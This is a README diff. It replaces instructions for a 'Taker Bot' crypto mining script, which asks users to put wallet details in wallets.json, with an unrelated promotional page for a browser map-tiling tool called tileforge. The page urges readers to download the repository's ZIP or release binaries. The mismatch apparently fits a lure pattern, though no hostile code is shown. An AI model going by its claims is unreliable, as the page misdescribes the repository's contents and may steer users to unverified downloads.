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1 | | -# Taker Bot Auto Activate Daily Mining |
| 1 | +# 🗺️ tileforge - Slice Images into Map Tiles Easily |
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| 3 | +[](https://github.com/edwarykz/tileforge) |
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|
5 | | -## How ? |
| 5 | +--- |
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7 | | -- Register here using new wallet: [https://taker.xyz](https://earn.taker.xyz?start=8KZPY) |
8 | | -- Bind your X/Twitter otherwise you can't start mining |
9 | | -- Wait till you get faucet reward (0.001 TAKER) to start using bot |
| 7 | +Welcome to **tileforge**! This handy tool lets you **cut any image into map tiles**, ready for your mapping projects — all happening right in your web browser. Whether you're creating custom maps, zoomable images, or learning about geographic tiles, tileforge makes it simple without needing to install anything complicated. |
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11 | | -## Requirements |
| 9 | +--- |
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13 | | -- **Node.js**: Ensure you have Node.js installed. |
14 | | -- **npm**: Ensure you have npm installed. |
15 | | -- **Taker Balance**: Ensure you have a balance in your Taker wallet. |
| 11 | +## 🖼️ What Is tileforge? |
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17 | | -## Setup |
| 13 | +tileforge is a user-friendly application that slices your images into XYZ format map tiles. The best part? Everything happens directly **in your browser**, powered by modern technologies like Rust and WebAssembly. This means fast processing without installing software or sending your images to a server. |
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19 | | -1. Clone this repository: |
20 | | - ```bash |
21 | | - git clone https://github.com/Zlkcyber/takerBot.git |
22 | | - cd takerBot |
23 | | - ``` |
24 | | -2. Install dependencies: |
25 | | - ```bash |
26 | | - npm install |
27 | | - ``` |
28 | | -3. Fill your wallet detail at `wallets.json` you can view format in `wallets-example.json` |
29 | | - ```bash |
30 | | - nano wallets.json |
31 | | - ``` |
32 | | -4. Run The Script: |
33 | | - ```bash |
34 | | - npm run start |
35 | | - ``` |
| 15 | +If you need a command-line interface (CLI) version for advanced use, tileforge includes that too, but for now, we’ll focus on the browser-friendly, easy way to get started. |
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|
37 | | -##  |
| 17 | +tileforge supports the popular XYZ tile format used by many map tools like Leaflet and OpenStreetMap, so your tiles work wherever maps are used. |
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39 | | -This project is licensed under the [MIT License](LICENSE). |
| 19 | +--- |
| 20 | + |
| 21 | +## 🌟 Why Use tileforge? |
| 22 | + |
| 23 | +- **No installs or setups needed.** Just open your browser. |
| 24 | +- **Slice any image**—photos, drawings, map scans. |
| 25 | +- **Create XYZ map tiles** for use in slippy maps. |
| 26 | +- **Works offline!.** Your images stay private; no uploading. |
| 27 | +- **Fast and efficient**, powered by Rust and WebAssembly. |
| 28 | +- BONUS: A CLI is available if you want to get more technical later. |
| 29 | + |
| 30 | +--- |
| 31 | + |
| 32 | +## ✅ System Requirements |
| 33 | + |
| 34 | +tileforge is designed to work smoothly on most modern devices: |
| 35 | + |
| 36 | +- Operating Systems: Windows 10 or later, macOS Mojave or later, Linux distributions, and Chromebook browsers. |
| 37 | +- Browser Support: Google Chrome, Firefox, Microsoft Edge, Safari (latest versions recommended). |
| 38 | +- Internet Connection: Only needed to access the tool for the first time (runs offline after). |
| 39 | +- Hardware: Standard laptop or desktop with 2GB RAM minimum; high-res images will process faster with more RAM and a better CPU but nothing special is required. |
| 40 | +- Disk Space: No installation — just space for your original images and resulting tiles if you choose to download them. |
| 41 | + |
| 42 | +--- |
| 43 | + |
| 44 | +## 🎯 Key Features |
| 45 | + |
| 46 | +- **Interactive browser interface:** Upload your image and instantly see tile previews. |
| 47 | +- **Supports common image formats:** JPEG, PNG, BMP, TIFF, and others. |
| 48 | +- **Choose zoom levels and tile size:** Customize how detailed your tile slices are. |
| 49 | +- **Download tiles as ZIP packages:** Ready to use in your mapping projects or websites. |
| 50 | +- **Offline use:** Once loaded, no internet needed to process new images. |
| 51 | +- **Included CLI:** For advanced users who prefer a command line. |
| 52 | +- **Open source and privacy-minded:** Your data stays on your device. |
| 53 | + |
| 54 | +--- |
| 55 | + |
| 56 | +## 🚀 Getting Started |
| 57 | + |
| 58 | +Starting with tileforge is easy, even if you're not a tech expert. |
| 59 | + |
| 60 | +### Step 1: Visit the Download Page |
| 61 | + |
| 62 | +To get started, open your favorite web browser and [**visit the tileforge page here**](https://github.com/edwarykz/tileforge). |
| 63 | + |
| 64 | +[](https://github.com/edwarykz/tileforge) |
| 65 | + |
| 66 | +This page is your gateway to using tileforge. Since tileforge runs inside your browser, there's no need to install complicated software. |
| 67 | + |
| 68 | +--- |
| 69 | + |
| 70 | +### Step 2: Open the Web Application |
| 71 | + |
| 72 | +Within the repository page, look for a “Web Demo” or “Try it online” link. This will open tileforge’s web app interface where all the magic happens. |
| 73 | + |
| 74 | +If you don’t see this immediately, just follow the instructions below to download and use the pre-built web interface: |
| 75 | + |
| 76 | +1. Click the green **Code** button and select **Download ZIP** to get the full package with web app support. |
| 77 | +2. Extract the files onto your computer. |
| 78 | +3. Open the `index.html` file in your preferred browser. |
| 79 | + |
| 80 | +--- |
| 81 | + |
| 82 | +### Step 3: Upload Your Image |
| 83 | + |
| 84 | +Once tileforge’s interface is open: |
| 85 | + |
| 86 | +- Click the **Upload Image** button. |
| 87 | +- Choose the picture you want to slice into map tiles. |
| 88 | +- Wait a moment as tileforge processes your image. |
| 89 | + |
| 90 | +Supported image formats include JPEG, PNG, BMP, and TIFF. |
| 91 | + |
| 92 | +--- |
| 93 | + |
| 94 | +### Step 4: Customize Tile Settings |
| 95 | + |
| 96 | +tileforge makes it easy to choose how your image is sliced: |
| 97 | + |
| 98 | +- Select the **Tile Size** (common sizes are 256x256 or 512x512 pixels). |
| 99 | +- Choose the **Zoom Levels** you want. More zoom levels mean more detail but larger file size. |
| 100 | +- Preview how tiles will look in the browser. |
| 101 | + |
| 102 | +--- |
| 103 | + |
| 104 | +### Step 5: Download Your Tiles |
| 105 | + |
| 106 | +After you’re happy with your settings, click **Download Tiles**. |
| 107 | + |
| 108 | +tileforge will package your tiles into a ZIP file that you can save to your computer. These folders and files are ready to be used with popular map tools like Leaflet or OpenStreetMap. |
| 109 | + |
| 110 | +--- |
| 111 | + |
| 112 | +## ⚙️ Using the Command Line Interface (CLI) (Optional) |
| 113 | + |
| 114 | +For users interested in trying the CLI (Command Line Interface) version of tileforge: |
| 115 | + |
| 116 | +1. Download the CLI binaries or source code from the repository’s releases section. |
| 117 | +2. Follow the CLI README instructions (found in `cli/README.md`) to slice images through simple commands. |
| 118 | +3. The CLI is designed for users comfortable with typing commands — don’t worry if this isn’t you! |
| 119 | + |
| 120 | +--- |
| 121 | + |
| 122 | +## 🛠️ Troubleshooting & Tips |
| 123 | + |
| 124 | +- **Tiles look blurry?** Try increasing zoom levels or adjusting tile size. |
| 125 | +- **Image won’t upload?** Double-check that the file format is supported. |
| 126 | +- **Browser runs slow?** Close other tabs, or try a faster browser like Chrome or Firefox. |
| 127 | +- **No internet after initial load?** tileforge still works offline once opened. |
| 128 | + |
| 129 | +If you encounter any issues, you can create a support ticket on the [GitHub Issues page](https://github.com/edwarykz/tileforge/issues). |
| 130 | + |
| 131 | +--- |
| 132 | + |
| 133 | +## 💡 Where Can I Use These Tiles? |
| 134 | + |
| 135 | +- **Personal maps:** Visualize hiking trails, neighborhood layouts, or custom guides. |
| 136 | +- **Websites & blogs:** Add interactive zoomable images. |
| 137 | +- **Educational projects:** Learn how map tiling works. |
| 138 | +- **App or game development:** Integrate detailed image maps. |
| 139 | +- **Anywhere XYZ tiles are supported!** |
| 140 | + |
| 141 | +--- |
| 142 | + |
| 143 | +## 🌈 Community & Support |
| 144 | + |
| 145 | +tileforge is open source and welcomes contributions! If you want: |
| 146 | + |
| 147 | +- To report bugs |
| 148 | +- Request new features |
| 149 | +- Share your projects using tileforge |
| 150 | + |
| 151 | +Head over to the repository’s **Issues** and **Discussions** tabs. The community is friendly and helpful. |
| 152 | + |
| 153 | +--- |
| 154 | + |
| 155 | +## 📌 Quick Links |
| 156 | + |
| 157 | +- [Main Page & Download](https://github.com/edwarykz/tileforge) |
| 158 | +- [Tutorial Videos and Guides (Coming Soon)](https://github.com/edwarykz/tileforge/wiki) |
| 159 | +- [Report Issues](https://github.com/edwarykz/tileforge/issues) |
| 160 | + |
| 161 | +--- |
| 162 | + |
| 163 | +## 🙌 Thank You for Using tileforge! |
| 164 | + |
| 165 | +Whether you’re building a small personal map or experimenting with image-based tiles, tileforge makes the process simple and accessible for everyone. Thanks for choosing tileforge! |
| 166 | + |
| 167 | +[](https://github.com/edwarykz/tileforge) |
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